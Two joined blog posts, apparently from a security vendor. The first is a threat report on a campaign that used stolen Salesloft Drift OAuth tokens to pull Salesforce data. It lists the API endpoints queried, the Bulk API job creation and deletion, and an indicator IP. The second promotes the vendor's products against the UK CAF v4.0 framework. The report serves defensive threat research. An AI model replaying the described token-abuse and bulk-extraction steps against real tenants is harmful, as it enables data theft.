The campaign is believed to have started on August 8, 2025, with malicious activity continuing until at least August 18. The threat actor, tracked as UNC6395, gained access via compromised OAuth tokens associated with Salesloft Drift integrations into Salesforce [1]. Once tokens were obtained, the attackers were able to issue large volumes of Salesforce API requests, exfiltrating sensitive customer and business data.

Initial Intrusion

The attackers first established access by abusing OAuth and refresh tokens from the Drift integration. These tokens gave them persistent access into Salesforce environments without requiring further authentication [1]. To expand their foothold, the threat actor also made use of TruffleHog [4], an open-source secrets scanner, to hunt for additional exposed credentials. Logs later revealed anomalous IAM updates, including unusual UpdateAccessKey activity, which suggested attempts to ensure long-term persistence and control within compromised accounts.

Internal Reconnaissance & Data Exfiltration

Once inside, the adversaries began exploring the Salesforce environments. They ran queries designed to pull sensitive data fields, focusing on objects such as Cases, Accounts, Users, and Opportunities [1]. At the same time, the attackers sifted through this information to identify secrets that could enable access to other systems, including AWS keys and Snowflake credentials [4]. This phase demonstrated the opportunistic nature of the campaign, with the actors looking for any data that could be repurposed for further compromise.

Lateral Movement

Salesloft and Mandiant investigations revealed that the threat actor also created at least one new user account in early September. Although follow-up activity linked to this account was limited, the creation itself suggested a persistence mechanism designed to survive remediation efforts. By maintaining a separate identity, the attackers ensured they could regain access even if their stolen OAuth tokens were revoked.

Accomplishing the mission

The data taken from Salesforce environments included valuable business records, which attackers used to harvest credentials and identify high-value targets. According to Mandiant, once the data was exfiltrated, the actors actively sifted through it to locate sensitive information that could be leveraged in future intrusions [1]. In response, Salesforce and Salesloft revoked OAuth tokens associated with Drift integrations on August 20 [1], a containment measure aimed at cutting off the attackers’ primary access channel and preventing further abuse.

How did the attack bypass the rest of the security stack?

The campaign effectively bypassed security measures by using legitimate credentials and OAuth tokens through the Salesloft Drift integration. This rendered traditional security defenses like endpoint protection and firewalls ineffective, as the activity appeared non-malicious [1]. The attackers blended into normal operations by using common user agents and making queries through the Salesforce API, which made their activity resemble legitimate integrations and scripts. This allowed them to operate undetected in the SaaS environment, exploiting the trust in third-party connections and highlighting the limitations of traditional detection controls.

Darktrace Coverage

Anomalous activities have been identified across multiple Darktrace deployments that appear associated with this campaign. This included two cases on customers based within the United States who had a Salesforce integration, where the pattern of activities was notably similar.

On August 17, Darktrace observed an account belonging to one of these customers logging in from the rare endpoint 208.68.36[.]90, while the user was seen active from another location. This IP is a known indicator of compromise (IoC) reported by open-source intelligence (OSINT) for the campaign [2].

Cyber AI Analyst Incident summarizing the suspicious login seen for the account.
Figure 1: Cyber AI Analyst Incident summarizing the suspicious login seen for the account.

The login event was associated with the application Drift, further connecting the events to this campaign.

Advanced Search logs showing the Application used to login.
Figure 2: Advanced Search logs showing the Application used to login.

Following the login, the actor initiated a high volume of Salesforce API requests using methods such as GET, POST, and DELETE. The GET requests targeted endpoints like /services/data/v57.0/query and /services/data/v57.0/sobjects/Case/describe, where the former is used to retrieve records based on a specific criterion, while the latter provides metadata for the Case object, including field names and data types [5,6].

Subsequently, a POST request to /services/data/v57.0/jobs/query was observed, likely to initiate a Bulk API query job for extracting large volumes of data from the Ingest Job endpoint [7,8].

Finally, a DELETE request to remove an ingestion job batch, possibly an attempt to obscure traces of prior data access or manipulation.

A case on another US-based customer took place a day later, on August 18. This again began with an account logging in from the rare IP 208.68.36[.]90 involving the application Drift. This was followed by Salesforce GET requests targeting the same endpoints as seen in the previous case, and then a POST to the Ingest Job endpoint and finally a DELETE request, all occurring within one minute of the initial suspicious login.

The chain of anomalous behaviors, including a suspicious login and delete request, resulted in Darktrace’s Autonomous Response capability suggesting a ‘Disable user’ action. However, the customer’s deployment configuration required manual confirmation for the action to take effect.

An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 3: An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 4: Model Alert Event Log showing various model alerts for the account that ultimately led to an Autonomous Response model being triggered.

Conclusion

In conclusion, this incident underscores the escalating risks of SaaS supply chain attacks, where third-party integrations can become avenues for attacks. It demonstrates how adversaries can exploit legitimate OAuth tokens and API traffic to circumvent traditional defenses. This emphasizes the necessity for constant monitoring of SaaS and cloud activity, beyond just endpoints and networks, while also reinforcing the significance of applying least privilege access and routinely reviewing OAuth permissions in cloud environments. Furthermore, it provides a wider perspective into the evolution of the threat landscape, shifting towards credential and token abuse as opposed to malware-driven compromise.

Appendices

Darktrace Model Detections

·      SaaS / Access / Unusual External Source for SaaS Credential Use

·      SaaS / Compromise / Login From Rare Endpoint While User Is Active

·      SaaS / Compliance / Anomalous Salesforce API Event

·      SaaS / Unusual Activity / Multiple Unusual SaaS Activities

·      Antigena / SaaS / Antigena Unusual Activity Block

·      Antigena / SaaS / Antigena Suspicious Source Activity Block

Customers should consider integrating Salesforce with Darktrace where possible. These integrations allow better visibility and correlation to spot unusual behavior and possible threats.

IoC List

(IoC – Type)

·      208.68.36[.]90 – IP Address

References

1.     https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift

2.     https://trust.salesloft.com/?uid=Drift+Security+Update%3ASalesforce+Integrations+%283%3A30PM+ET%29

3.     https://thehackernews.com/2025/08/salesloft-oauth-breach-via-drift-ai.html

4.     https://unit42.paloaltonetworks.com/threat-brief-compromised-salesforce-instances/

5.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_query.htm

6.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_sobject_describe.htm

7.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/get_job_info.htm

8.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/query_create_job.htm

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

/

September 8, 2025

Cyber Assessment Framework v4.0 Raises the Bar: 6 Questions every security team should ask about their security posture

CAF v4.0 cyber assessment frameworkDefault blog imageDefault blog image

What is the Cyber Assessment Framework?

The Cyber Assessment Framework (CAF) acts as guide for organizations, specifically across essential services, critical national infrastructure and regulated sectors, across the UK for assessing, managing and improving their cybersecurity, cyber resilience and cyber risk profile.

The guidance in the Cyber Assessment Framework aligns with regulations such as The Network and Information Systems Regulations (NIS), The Network and Information Security Directive (NIS2) and the Cyber Security and Resilience Bill.

What’s new with the Cyber Assessment Framework 4.0?

On 6 August 2025, the UK’s National Cyber Security Centre (NCSC) released Cyber Assessment Framework 4.0 (CAF v4.0) a pivotal update that reflects the increasingly complex threat landscape and the regulatory need for organisations to respond in smarter, more adaptive ways.

The Cyber Assessment Framework v4.0 introduces significant shifts in expectations, including, but not limited to:

  • Understanding threats in terms of the capabilities, methods and techniques of threat actors and the importance of maintaining a proactive security posture (A2.b)
  • The use of secure software development principles and practices (A4.b)
  • Ensuring threat intelligence is understood and utilised - with a focus on anomaly-based detection (C1.f)
  • Performance of proactive threat hunting with automation where appropriate (C2.a)

This blog post will focus on these components of the framework. However, we encourage readers to get the full scope of the framework by visiting the NCSC website where they can access the full framework here.

In summary, the changes to the framework send a clear signal: the UK’s technical authority now expects organisations to move beyond static rule-based systems and embrace more dynamic, automated defences. For those responsible for securing critical national infrastructure and essential services, these updates are not simply technical preferences, but operational mandates.

At Darktrace, this evolution comes as no surprise. In fact, it reflects the approach we've championed since our inception.

Why Darktrace? Leading the way since 2013

Darktrace was built on the principle that detecting cyber threats in real time requires more than signatures, thresholds, or retrospective analysis. Instead, we pioneered a self-learning approach powered by artificial intelligence, that understands the unique “normal” for every environment and uses this baseline to spot subtle deviations indicative of emerging threats.

From the beginning, Darktrace has understood that rules and lists will never keep pace with adversaries. That’s why we’ve spent over a decade developing AI that doesn't just alert, it learns, reasons, explains, and acts.

With Cyber Assessment Framework v4.0, the bar has been raised to meet this new reality. For technical practitioners tasked with evaluating their organisation’s readiness, there are five essential questions that should guide the selection or validation of anomaly detection capabilities.

6 Questions you should ask about your security posture to align with CAF v4

1. Can your tools detect threats by identifying anomalies?

Cyber Assessment Framework v4.0 principle C1.f has been added in this version and requires that, “Threats to the operation of network and information systems, and corresponding user and system behaviour, are sufficiently understood. These are used to detect cyber security incidents.”

This marks a significant shift from traditional signature-based approaches, which rely on known Indicators of Compromise (IOCs) or predefined rules to an expectation that normal user and system behaviour is understood to an extent enabling abnormality detection.

Why this shift?

An overemphasis on threat intelligence alone leaves defenders exposed to novel threats or new variations of existing threats. By including reference to “understanding user and system behaviour” the framework is broadening the methods of threat detection beyond the use of threat intelligence and historical attack data.

While CAF v4.0 places emphasis on understanding normal user and system behaviour and using that understanding to detect abnormalities and as a result, adverse activity. There is a further expectation that threats are understood in terms of industry specific issues and that monitoring is continually updated  

Darktrace uses an anomaly-based approach to threat detection which involves establishing a dynamic baseline of “normal” for your environment, then flagging deviations from that baseline — even when there’s no known IoCs to match against. This allows security teams to surface previously unseen tactics, techniques, and procedures in real time, whether it’s:

  • An unexpected outbound connection pattern (e.g., DNS tunnelling);
  • A first-time API call between critical services;
  • Unusual calls between services; or  
  • Sensitive data moving outside normal channels or timeframes.

The requirement that organisations must be equipped to monitor their environment, create an understanding of normal and detect anomalous behaviour aligns closely with Darktrace’s capabilities.

2. Is threat hunting structured, repeatable, and improving over time?

CAF v4.0 introduces a new focus on structured threat hunting to detect adverse activity that may evade standard security controls or when such controls are not deployable.  

Principle C2.a outlines the need for documented, repeatable threat hunting processes and stresses the importance of recording and reviewing hunts to improve future effectiveness. This inclusion acknowledges that reactive threat hunting is not sufficient. Instead, the framework calls for:

  • Pre-determined and documented methods to ensure threat hunts can be deployed at the requisite frequency;
  • Threat hunts to be converted  into automated detection and alerting, where appropriate;  
  • Maintenance of threat hunt  records and post-hunt analysis to drive improvements in the process and overall security posture;
  • Regular review of the threat hunting process to align with updated risks;
  • Leveraging automation for improvement, where appropriate;
  • Focus on threat tactics, techniques and procedures, rather than one-off indicators of compromise.

Traditionally, playbook creation has been a manual process — static, slow to amend, and limited by human foresight. Even automated SOAR playbooks tend to be stock templates that can’t cover the full spectrum of threats or reflect the specific context of your organisation.

CAF v4.0 sets the expectation that organisations should maintain documented, structured approaches to incident response. But Darktrace / Incident Readiness & Recovery goes further. Its AI-generated playbooks are bespoke to your environment and updated dynamically in real time as incidents unfold. This continuous refresh of “New Events” means responders always have the latest view of what’s happening, along with an updated understanding of the AI's interpretation based on real-time contextual awareness, and recommended next steps tailored to the current stage of the attack.

The result is far beyond checkbox compliance: a living, adaptive response capability that reduces investigation time, speeds containment, and ensures actions are always proportionate to the evolving threat.

3. Do you have a proactive security posture?

Cyber Assessment Framework v4.0 does not want organisations to detect threats, it expects them to anticipate and reduce cyber risk before an incident ever occurs. That is s why principle A2.b calls for a security posture that moves from reactive detection to predictive, preventative action.

A proactive security posture focuses on reducing the ease of the most likely attack paths in advance and reducing the number of opportunities an adversary has to succeed in an attack.

To meet this requirement, organisations could benefit in looking for solutions that can:

  • Continuously map the assets and users most critical to operations;
  • Identify vulnerabilities and misconfigurations in real time;
  • Model likely adversary behaviours and attack paths using frameworks like MITRE ATT&CK; and  
  • Prioritise remediation actions that will have the highest impact on reducing overall risk.

When done well, this approach creates a real-time picture of your security posture, one that reflects the dynamic nature and ongoing evolution of both your internal environment and the evolving external threat landscape. This enables security teams to focus their time in other areas such as  validating resilience through exercises such as red teaming or forecasting.

4. Can your team/tools customize detection rules and enable autonomous responses?

CAF v4.0 places greater emphasis on reducing false positives and acting decisively when genuine threats are detected.  

The framework highlights the need for customisable detection rules and, where appropriate, autonomous response actions that can contain threats before they escalate:

The following new requirements are included:  

  • C1.c.: Alerts and detection rules should be adjustable to reduce false positives and optimise responses. Custom tooling and rules are used in conjunction with off the shelf tooling and rules;
  • C1.d: You investigate and triage alerts from all security tools and take action – allowing for improvement and prioritization of activities;
  • C1.e: Monitoring and detection personnel have sufficient understanding of operational context and deal with workload effectively as well as identifying areas for improvement (alert or triage fatigue is not present);
  • C2.a: Threat hunts should be turned into automated detections and alerting where appropriate and automation should be leveraged to improve threat hunting.

Tailored detection rules improve accuracy, while automation accelerates response, both of which help satisfy regulatory expectations. Cyber AI Analyst allows for AI investigation of alerts and can dramatically reduce the time a security team spends on alerts, reducing alert fatigue, allowing more time for strategic initiatives and identifying improvements.

5. Is your software secure and supported?  

CAF v4.0 introduced a new principle which requires software suppliers to leverage an established secure software development framework. Software suppliers must be able to demonstrate:  

  • A thorough understanding of the composition and provenance of software provided;  
  • That the software development lifecycle is informed by a detailed and up to date understanding of threat; and  
  • They can attest to the authenticity and integrity of the software, including updates and patches.  

Darktrace is committed to secure software development and all Darktrace products and internally developed systems are developed with secure engineering principles and security by design methodologies in place. Darktrace commits to the inclusion of security requirements at all stages of the software development lifecycle. Darktrace is ISO 27001, ISO 27018 and ISO 42001 Certified – demonstrating an ongoing commitment to information security, data privacy and artificial intelligence management and compliance, throughout the organisation.  

6. Is your incident response plan built on a true understanding of your environment and does it adapt to changes over time?

CAF v4.0 raises the bar for incident response by making it clear that a plan is only as strong as the context behind it. Your response plan must be shaped by a detailed, up-to-date understanding of your organisation’s specific network, systems, and operational priorities.

The framework’s updates emphasise that:

  • Plans must explicitly cover the network and information systems that underpin your essential functions because every environment has different dependencies, choke points, and critical assets.
  • They must be readily accessible even when IT systems are disrupted ensuring critical steps and contact paths aren’t lost during an incident.
  • They should be reviewed regularly to keep pace with evolving risks, infrastructure changes, and lessons learned from testing.

From government expectation to strategic advantage

Cyber Assessment Framework v4.0 signals a powerful shift in cybersecurity best practice. The newest version sets a higher standard for detection performance, risk management, threat hunting software development and proactive security posture.

For Darktrace, this is validation of the approach we have taken since the beginning: to go beyond rules and signatures to deliver proactive cyber resilience in real-time.

-----

Disclaimer:

This document has been prepared on behalf of Darktrace Holdings Limited. It is provided for information purposes only to provide prospective readers with general information about the Cyber Assessment Framework (CAF) in a cyber security context. It does not constitute legal, regulatory, financial or any other kind of professional advice and it has not been prepared with the reader and/or its specific organisation’s requirements in mind. Darktrace offers no warranties, guarantees, undertakings or other assurances (whether express or implied)  that: (i) this document or its content are  accurate or complete; (ii) the steps outlined herein will guarantee compliance with CAF; (iii) any purchase of Darktrace’s products or services will guarantee compliance with CAF; (iv) the steps outlined herein are appropriate for all customers. Neither the reader nor any third party is entitled to rely on the contents of this document when making/taking any decisions or actions to achieve compliance with CAF. To the fullest extent permitted by applicable law or regulation, Darktrace has no liability for any actions or decisions taken or not taken by the reader to implement any suggestions contained herein, or for any third party products, links or materials referenced. Nothing in this document negates the responsibility of the reader to seek independent legal or other advice should it wish to rely on any of the statements, suggestions, or content set out herein.  

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI